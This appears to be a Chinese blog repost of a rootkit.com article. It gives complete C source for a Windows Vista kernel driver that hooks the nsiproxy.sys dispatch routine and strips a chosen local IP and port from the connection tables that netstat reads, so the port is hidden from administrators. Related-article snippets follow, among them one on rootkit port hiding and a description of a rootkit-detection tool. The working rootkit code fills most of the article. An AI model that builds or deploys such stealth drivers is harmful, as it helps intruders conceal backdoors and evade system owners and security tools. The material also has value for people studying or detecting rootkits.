Windows Vista 下挂钩NSI模块隐藏端口

最新推荐文章于 2024-08-21 18:56:25 发布
最新推荐文章于 2024-08-21 18:56:25 发布
阅读量3.5k 收藏 1
点赞数
分类专栏: win32 文章标签: windows table tcp struct hp php
本文介绍了一种在Windows Vista系统下隐藏特定端口的方法,通过挂钩NSI内核模块派遣例程,过滤指定IP和端口的数据,使得netstat等工具无法显示这些端口的连接状态。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

作者:cardmagic

原文链接:http://www.rootkit.com/newsread.php?newsid=735

Windows Vista 的网络模块较从前发生了很大变化,从而导致很多旧的端口隐藏工具无法使用.

本文将介绍一种简单的在Vista下隐藏端口的方法,希望对大家有所帮助.

事实上在Vistanetstat.exe调用Iphlpapi.dll导出的InternalGetTcpTable2函数实现对所有打开端口的列举. InternalGetTcpTable2随后调用由nsi.dll导出的NsiAllocateAndGetTable 函数,nsi.dll则调用NsiEnumerateObjectsAllParametersExnsiproxy.sys发送Irp最终转入内核.nsiproxy.sys又只是对netio.sys的简单封装,它最终调用了netio.sys导出的内核服务例程.

我们将通过使用挂钩NSI内核模块派遣例程这样一种比较简单的方法,来演示如何隐藏Vista的指定端口.挂钩派遣例程是一个老话题了,这次我们将他应用于nsiproxy.sys.请注意在钩子中对NSI内容的过虑处理:)

下面是代码(注意:我只在Windows Vista RTM 32bit系统下进行了测试):

 

///
//  Filename: PortHidDemo_Vista.c
 //  
 //  Author: CardMagic(Edward)
 //  Email: sunmy1@sina.com
 //  MSN:  onlyonejazz at hotmail.com
 //
//  Description: 
 //             A Demostration Of Hiding
 //            Specified Port Under Windows Vista RTM 32bit.
 //       Tested Under Windows Vista Kernel Version 6000 MP (1 procs) Free x86 compatible
 //
//  

#include  " stdlib.h "
#include  " ntifs.h "

unsigned  short  htons(unsigned  short  hostshort);
unsigned  long   inet_addr( const   char   * name);
typedef unsigned  long  DWORD;


 #define  LOCALHIDEIP "10.28.157.71"
#define  LOCALHIDEPORT 139


#define  IOCTL_NSI_GETALLPARAM 0x12001B

extern  POBJECT_TYPE  * IoDeviceObjectType, * IoDriverObjectType;
PDRIVER_OBJECT pNsiDrvObj  =   0 ;
PDRIVER_DISPATCH orgNsiDeviceIoControl  =   0 ;


DWORD gLocalPort = 0 ,gLocalIp = 0 ;

typedef  struct  _HP_CONTEXT
 {
    PIO_COMPLETION_ROUTINE oldIocomplete;
    PVOID oldCtx;    
    BOOLEAN bShouldInvolve;
    PKPROCESS pcb;
} HP_CONTEXT, * PHP_CONTEXT;

typedef  struct  _INTERNAL_TCP_TABLE_SUBENTRY
 {
    char bytesfill0[2];
    USHORT Port;
    DWORD dwIP;
    char bytesfill[20];

} INTERNAL_TCP_TABLE_SUBENTRY, * PINTERNAL_TCP_TABLE_SUBENTRY;

typedef  struct  _INTERNAL_TCP_TABLE_ENTRY
 {
    INTERNAL_TCP_TABLE_SUBENTRY localEntry;
    INTERNAL_TCP_TABLE_SUBENTRY remoteEntry;
    
} INTERNAL_TCP_TABLE_ENTRY, * PINTERNAL_TCP_TABLE_ENTRY;

typedef  struct  _NSI_STATUS_ENTRY
 {
    char bytesfill[12]; 

} NSI_STATUS_ENTRY, * PNSI_STATUS_ENTRY;

typedef  struct  _NSI_PARAM
 {
    //
    // Total 3CH size
    //
    DWORD UnknownParam1;
    DWORD UnknownParam2;
    DWORD UnknownParam3;
    DWORD UnknownParam4;
    DWORD UnknownParam5;
    DWORD UnknownParam6;
    PVOID lpMem;
    DWORD UnknownParam8;
    DWORD UnknownParam9;
    DWORD UnknownParam10;
    PNSI_STATUS_ENTRY lpStatus;
    DWORD UnknownParam12;
    DWORD UnknownParam13;
    DWORD UnknownParam14;
    DWORD TcpConnCount;


} NSI_PARAM, * PNSI_PARAM;



unsigned  short  htons(unsigned  short  a)
 {
    unsigned short b = a;
    b = ( b << 8 );
    a = ( a >> 8 );
    return ( a | b );
} ;

unsigned  long  inet_addrt( const   char *  name)
 {
    int i,j,p;
    int len = strlen(name);
    unsigned long temp_val[4];
    char namesec[10] ;

    for(i = 0,j =0,p =0;i < len;i++)
    {
        memset(namesec,0,10);
        if('.' == name[i])
        {

            if(p)
                strncpy(namesec,name+p+1,i-p);
            else
                strncpy(namesec,name,i);
            temp_val[j] = atoi(namesec);
            j++;
            p = i;
        }
    }

    strncpy(namesec,name+p+1,i-p);
    temp_val[j] = atoi(namesec);


    return (temp_val[0]|(temp_val[1]<<8)|(temp_val[2]<<16)|(temp_val[3]<<24));
}



NTSTATUS
HPCompletion(
             IN PDEVICE_OBJECT  DeviceObject,
             IN PIRP  Irp,
             IN PVOID  Context
             )
 {
    PIO_STACK_LOCATION irpsp = IoGetCurrentIrpStackLocation(Irp);
    PIO_STACK_LOCATION irpspNext = IoGetNextIrpStackLocation(Irp);
    PHP_CONTEXT pCtx = Context;
    PNSI_PARAM nsiParam;
    int i;
    

    if(NT_SUCCESS(Irp->IoStatus.Status))
    {

        nsiParam = Irp->UserBuffer;
        if(MmIsAddressValid(nsiParam->lpMem))
        {
            //
            // netstat will involve internal calls which will use 
            // nsiParam structure
            //
            if(    (nsiParam->UnknownParam8 == 0x38))
            {
                KAPC_STATE apcstate;
                PNSI_STATUS_ENTRY pStatusEntry = (PNSI_STATUS_ENTRY)nsiParam->lpStatus;
                PINTERNAL_TCP_TABLE_ENTRY pTcpEntry = (PINTERNAL_TCP_TABLE_ENTRY)nsiParam->lpMem;
                int nItemCnt = nsiParam->TcpConnCount;
                

                KeStackAttachProcess(pCtx->pcb,&apcstate);
                
                //
                //make sure we are in the context of original process
                //
                for(i = 0;i < nItemCnt;i ++)
                {

                    if((pTcpEntry[i].localEntry.dwIP == gLocalIp)&&(pTcpEntry[i].localEntry.Port == gLocalPort))
                    {
                        //
                        //NSI will map status array entry to tcp table array entry
                        //we must modify both synchronously
                        //
                        RtlCopyMemory(&pTcpEntry[i],&pTcpEntry[i+1],sizeof(INTERNAL_TCP_TABLE_ENTRY)*(nItemCnt-i));
                        RtlCopyMemory(&pStatusEntry[i],&pStatusEntry[i+1],sizeof(NSI_STATUS_ENTRY)*(nItemCnt-i));
                        nItemCnt--;
                        nsiParam->TcpConnCount --;
                        i--;
                        

                        
                    }
                }

                KeUnstackDetachProcess(&apcstate);
                
            }


        }
        
    }

    irpspNext->Context = pCtx->oldCtx;
    irpspNext->CompletionRoutine = pCtx->oldIocomplete;
    
    //
    //free the fake context
    //
    ExFreePool(Context);



    if(pCtx->bShouldInvolve)
        return irpspNext->CompletionRoutine(DeviceObject,Irp,Context);
    else
    {
        if (Irp->PendingReturned) {
            IoMarkIrpPending(Irp);
        }
        return STATUS_SUCCESS;
    }
    

}



NTSTATUS
ObReferenceObjectByName (
                         IN PUNICODE_STRING ObjectName,
                         IN ULONG Attributes,
                         IN PACCESS_STATE AccessState OPTIONAL,
                         IN ACCESS_MASK DesiredAccess OPTIONAL,
                         IN POBJECT_TYPE ObjectType,
                         IN KPROCESSOR_MODE AccessMode,
                         IN OUT PVOID ParseContext OPTIONAL,
                         OUT PVOID  * Object
                         );


NTSTATUS HPUnload(IN PDRIVER_OBJECT DriverObject)
 {
    LARGE_INTEGER waittime;

    waittime.QuadPart = -50*1000*1000;
    InterlockedExchange(&(pNsiDrvObj->MajorFunction[IRP_MJ_DEVICE_CONTROL]), orgNsiDeviceIoControl);

    //
    //delay loading driver to make it more secure
    //
    KeDelayExecutionThread(KernelMode,0,&waittime);

    return STATUS_SUCCESS;
}
   
NTSTATUS HPDummyDeviceIoControl( 
                                IN PDEVICE_OBJECT  DeviceObject,
                                IN PIRP  Irp
                                )
 {
    ULONG         ioControlCode;
    PIO_STACK_LOCATION irpStack;
    ULONG          status;

    irpStack = IoGetCurrentIrpStackLocation(Irp);

    ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode;

    if(IOCTL_NSI_GETALLPARAM == ioControlCode)
    {
        if(irpStack->Parameters.DeviceIoControl.InputBufferLength == sizeof(NSI_PARAM))
        {
            //
            //only care the related I/O
            //
            PHP_CONTEXT ctx = (HP_CONTEXT*)ExAllocatePool(NonPagedPool,sizeof(HP_CONTEXT));
            ctx->oldIocomplete = irpStack->CompletionRoutine;
            ctx->oldCtx = irpStack->Context;
            irpStack->CompletionRoutine = HPCompletion;
            irpStack->Context = ctx;
            ctx->pcb = IoGetCurrentProcess();

            if((irpStack->Control&SL_INVOKE_ON_SUCCESS) ==SL_INVOKE_ON_SUCCESS)
                ctx->bShouldInvolve = TRUE;
            else
                ctx->bShouldInvolve = FALSE;
            irpStack->Control |= SL_INVOKE_ON_SUCCESS;

                
        }



    }

    //
    //call original I/O control routine
    //
    status =  orgNsiDeviceIoControl(DeviceObject,Irp);

    return status;


}


NTSTATUS DriverEntry(
                   IN PDRIVER_OBJECT  DriverObject,
                   IN PUNICODE_STRING RegistryPath
                    )
 {
    

    int i;
    NTSTATUS status;
    UNICODE_STRING uniNsiDrvName;
    

#if DBG
        _asm int 3 //debug
#endif

    DriverObject->DriverUnload = HPUnload;

    RtlInitUnicodeString(&uniNsiDrvName,L"/Driver/nsiproxy");

    status = ObReferenceObjectByName(&uniNsiDrvName,OBJ_CASE_INSENSITIVE,NULL,0,*IoDriverObjectType,KernelMode,NULL,&pNsiDrvObj);

    if(!NT_SUCCESS(status))
    {
        return STATUS_SUCCESS;
        
    }


    //
    //store the original dispatch function of NSI driver
    //
    orgNsiDeviceIoControl = pNsiDrvObj->MajorFunction[IRP_MJ_DEVICE_CONTROL];
    

    gLocalIp = inet_addrt(LOCALHIDEIP);
    gLocalPort = htons(LOCALHIDEPORT);

    //
    //hook NSI dispatch routine
    //
    InterlockedExchange(&(pNsiDrvObj->MajorFunction[IRP_MJ_DEVICE_CONTROL]), HPDummyDeviceIoControl);

    return STATUS_SUCCESS;
}






关闭端口 实现隐身
~~~jesse的专栏
11-07 1964
Windows监听端口关闭这里的关闭服务是真正的关 请不要使用网上流传的其他关闭135端口方法,会出现系统问题。此篇文章从KFSensor的文档中得到信息 从网上搜集并测试验证过。原文一句:在这里我们需要把 window 默认提供的端口服务关闭,而让 KFSensor 来应答所有的端口服务请求。注:1.KFSensor是虚拟蜜罐防止黑客攻击的著名防体,价格高无破解无汉化
计算机网络nsi,运行 NSI 服务 Svchost.exe 泄漏内存和非页面缓冲池内存泄漏标记 NSpc...
weixin_36301296的博客
06-16 511
修补程序信息受支持的修补程序可从 Microsoft 支持。 然而,此修补程序仅用于解决本文中描述的问题。 此修复程序仅适用于遇到本文中描述的问题的系统。 此修补程序可能会接受进一步的测试。 因此,如果这个问题没有对您造成严重的影响,我们建议您等待包含此修复程序的下一个软件更新。如果此修复程序可供下载,则在此知识库文章的顶部会出现“修补程序下载可用”部分。 如果未显示此部分,请与 Microsof...
NSI Module Hook : Hiding Port Under Windows Vista
08-13 1903
cardmagic writes: Windows Vista has changed alot on network module, many old port hiding materials are no longer usable.In this post, I will share with you a simple code to hide port under Vista,hope
内核层枚举网络端口 Windows 10、x64、R0
sunjiaoya的博客
02-02 731
内核层枚举网络端口
进程与端口映射
weixin_34248258的博客
02-20 191
文章目录:                   1. Demo 效果展示: 2. 进程和端口乱扯淡: 3. 查询进程和端口的 API 的介绍: 4. 根据进程 ID 获得该进程所打开的 TCP 和 UDP 端口: 5. 根据端口号来获得打开该端口号的进程: 6. 小结:                           1. Demo 效果展示:             ...
bdist_nsi模块:为Python模块打造先进Windows安装程序
bdist_nsi模块的出现解决了这一问题,它能够利用Nullsoft Scriptable Install System(NSIS)创建带有现代用户界面的Windows安装程序。 NSIS是一个开放源代码的系统,用于制作Windows平台下的安装程序。它通过脚本...
NSI
03-09
国家统计局
个人 Windows 清理工具:NSI 脚本项目基础
资源摘要信息:"个人 Windows 清理工具是基于 NSI(Nullsoft Scriptable Install System)脚本项目开发的一款用于清理和优化Windows操作系统的软件。NSI 是一个广泛使用的安装程序制作工具,它允许开发者通过脚本语言...
Pinguino NSI 安装程序:Windows 下企鹅 IDE 环境搭建
资源摘要信息:"Pinguino-NSI-Installer是一个在Windows平台上安装Pinguino项目所需的软件。Pinguino项目是一个开源的硬件开发环境,主要面向Arduino兼容的硬件,如Pinguino微控制器。用户可以通过运行Pinguino-NSI-...
NSI制作自解压安装包.zip
02-29
NSI(Nullsoft Scriptable Install System)是一种强大的安装包制作工具,由Nullsoft公司开发,主要用于创建Windows平台上的安装程序。这个"NSI制作自解压安装包.zip"压缩包包含了一切你需要创建自解压安装包的资源...
PCHunter支持内核驱动模块的内存拷贝
04-28
1.进程、线程、进程模块、进程窗口、进程内存信息查看,杀进程、杀线程、卸载模块等功能   2.内核驱动模块查看,支持内核驱动模块的内存拷贝   3.SSDT、Shadow SSDT、FSD、KBD、TCPIP、Nsiproxy、Tdx、Classpnp、Atapi、Acpi、SCSI、IDT、GDT信息查看,并能检测和恢复ssdt hook和inline hook   4.CreateProcess、CreateThread、LoadImage、CmpCallback、BugCheckCallback、Shutdown、Lego等近20多种Notify Routine信息查看,并支持对这些Notify Routine的删除   5.端口信息查看,目前不支持2000系统   6.查看消息钩子   7.内核模块的iat、eat、inline hook、patches检测和恢复   8.磁盘、卷、键盘、网络层等过滤驱动检测,并支持删除   9.注册表编辑   10.进程iat、eat、inline hook、patches检测和恢复   11.文件系统查看,支持基本的文件操作   12.查看(编辑)IE插件、SPI、启动项、服务、Hosts文件、映像劫持、文件关联、系统防火墙规则、IME   13.ObjectType Hook检测和恢复   14.DPC定时器检测和删除   15.MBR Rootkit检测和修复   16.内核对象劫持检测
Rookit系列一 【隐藏网络端口】【支持Win7 x32/x64 ~ Win10 x32/x64】
qq_41252520的博客
08-04 1350
Rookit是个老生常谈的话题了,它包括隐藏进程、隐藏模块隐藏端口隐藏技术和其他对抗杀软的技术。作为一名二进制安全研究员你可以不去写这些代码,但你不能不懂,也因为最近隔壁组的同事在做这方面的检测向我请教了一些问题,索性我就利用空余时间研究了一下网络端口隐藏。网上随便去搜搜隐藏端口的资料,发现能用的几乎没有。这才是我研究的动力和分享的意义。\textcolor{green}{这才是我研究的动力和分享的意义。这才是我研究的动力和分享的意义。于是就自己研究了一通,发现也没什么特别的。
PortHidDemo_Vista
08-01 1412
///////////////////////////////////////////////////////////////////////////////////////// Filename: PortHidDemo_Vista.c// // Author: CardMagic(Edward)// Email: sunmy1@sina.com// MSN:  onlyonejazz at h
netStat逆向分析
weixin_30296405的博客
03-26 222
  netStat和Fport的功能差不多,据说xp上比fport少某些功能,但是我的xp可能比较特殊,fport的功能netStat上的都有,一头雾水地抓起WIn7的netStat就开始分析。      目标是五个功能 本地地址 [ip + 端口] 外部地址 [ip + 端口] 状态 PID 所有权信息   还是先通过IDA和OD,找到程序关键的函数 DoConnecti...
NSI程序打包脚本文件编写教程
最新发布
weixin_42253874的博客
08-21 1906
NSIS (Nullsoft Scriptable Install System) 是一个专业开源的制作 windows 安装程序的工具。我们通过HM NSIEDIT编写好脚本、编译即可生成exe安装包。安装过程中可以配置其安装包图标、名称、出版人、网站等。此外,还可以设置程序开机自启动、管理员权限运行等给基于注册表的操作,也可以运行批处理文件(bat文件)进行系统模块的安装。
nsis接收命令行参数,实现动态安装
卫可冬的博客
07-05 8294
; Script generated by the HM NIS Edit Script Wizard. var str4500 var str4501 var str4700 var strProductName !include "logiclib.nsh" !include "FileFunc.nsh" Name "DC系列" OutFile "Setup.exe" SilentI
端口截听实现端口隐藏,嗅探与攻击
uuty的专栏
10-15 1126
创建时间:2002-11-05文章属性:原创文章提交:flashsky (flashsky1_at_sina.com)作者:FLASHSKYEMAIL:flashsky@xfocus.org站点:www.xfocus.net  www.shopsky.com转载请注明原作者安全焦点在WINDOWS的SOCKET服务器应用的编程中,如下的语句或许比比都是:       s=socket(AF_INE
IOCTL Fuzzer 使用说明
zfs2008zfs的博客
06-16 2179
IOCTL Fuzzer ver. 1.3使用说明 最近在进行驱动测试时开始接触这些工具,使用过程中有一些困惑,可惜网上这方面的资料实在有限,自己摸索了一些使用方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值